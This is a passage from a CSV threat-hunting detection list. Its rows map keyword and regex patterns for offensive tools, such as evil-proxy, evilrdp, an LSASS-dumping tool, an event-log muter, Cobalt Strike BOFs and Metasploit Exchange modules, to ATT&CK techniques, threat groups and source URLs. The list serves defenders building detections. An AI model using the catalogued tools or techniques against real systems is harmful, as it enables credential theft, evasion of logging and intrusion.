TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43369" "*evil-proxy/agentproxy*",".{0,1000}evil\-proxy\/agentproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43370" "*evil-proxy/httpproxy*",".{0,1000}evil\-proxy\/httpproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43371" "*evil-proxy/selenium*",".{0,1000}evil\-proxy\/selenium.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43372" "*evil-proxy/version*",".{0,1000}evil\-proxy\/version.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43373" "*EvilProxy::HTTPProxyServer*",".{0,1000}EvilProxy\:\:HTTPProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43374" "*EvilProxy::MITMProxyServer*",".{0,1000}EvilProxy\:\:MITMProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43375" "*evil-proxy-0.1.0*",".{0,1000}evil\-proxy\-0\.1\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43376" "*evil-proxy-0.2.0*",".{0,1000}evil\-proxy\-0\.2\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43377" "*evil-proxy-master*",".{0,1000}evil\-proxy\-master.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43378" "*evilqr-main*",".{0,1000}evilqr\-main.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - 
TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43379" "*evilqr-phishing*",".{0,1000}evilqr\-phishing.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43380" "*evilqr-server*",".{0,1000}evilqr\-server.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43381" "*evilrdp.exe*",".{0,1000}evilrdp\.exe.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43382" "*evilrdp-main*",".{0,1000}evilrdp\-main.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black
Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43383" "*EvilSln-main*",".{0,1000}EvilSln\-main.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","43384" "*evilsocket/legba*",".{0,1000}evilsocket\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","43385" "*evilsocket@gmail.com*",".{0,1000}evilsocket\@gmail\.com.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","0","1","#email","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","43386" "*eviltree_x64.exe*",".{0,1000}eviltree_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","43387" 
"*EvilTwin.bin*",".{0,1000}EvilTwin\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43388" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43389" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43390" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43391" "*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43392" "*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43393" "*eviluser@tutanota.com*",".{0,1000}eviluser\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43394" "*evil-winrm -*",".{0,1000}evil\-winrm\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43395" "*evil-winrm*",".{0,1000}evil\-winrm.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","1","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","43396" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43397" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by 
windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43398" "*EvtMuteHook.iobj*",".{0,1000}EvtMuteHook\.iobj.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43399" "*EvtMuteHook.ipdb*",".{0,1000}EvtMuteHook\.ipdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43400" "*EvtMuteHook.pdb*",".{0,1000}EvtMuteHook\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43401" "*EvtMuteHook.sln*",".{0,1000}EvtMuteHook\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43402" "*EvtMute-master*",".{0,1000}EvtMute\-master.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43403" "*EVUAC *.exe*",".{0,1000}EVUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43404" "*ewby/Mockingjay_BOF*",".{0,1000}ewby\/Mockingjay_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","43405" "*ewok -t *",".{0,1000}ewok\s\-t\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","N/A","1","76","20","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z","43406" "*Ex_MiniDumpWriteDumpCallback*",".{0,1000}Ex_MiniDumpWriteDumpCallback.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary 
Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","43407" "*example-bof.sln*",".{0,1000}example\-bof\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 
BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","43408" "*examples/netview.py*",".{0,1000}examples\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43409" "*Excel-Exploit.git*",".{0,1000}Excel\-Exploit\.git.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","43410" "*Excel-Exploit-main*",".{0,1000}Excel\-Exploit\-main.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","43411" "*ExcelReflectImplant*",".{0,1000}ExcelReflectImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43412" "*excelshellinject.*",".{0,1000}excelshellinject\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","43413" "*exchange_proxylogon_rce.*",".{0,1000}exchange_proxylogon_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43414" "*exchange_proxynotshell_rce.*",".{0,1000}exchange_proxynotshell_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43415" "*Exe To Base 64 By hackers DZ.exe*",".{0,1000}Exe\sTo\sBase\s64\sBy\shackers\sDZ\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43416" "*exe_dll_shellcode genetic.config*",".{0,1000}exe_dll_shellcode\sgenetic\.config.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","43422" "*exe_stager.exe*",".{0,1000}exe_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 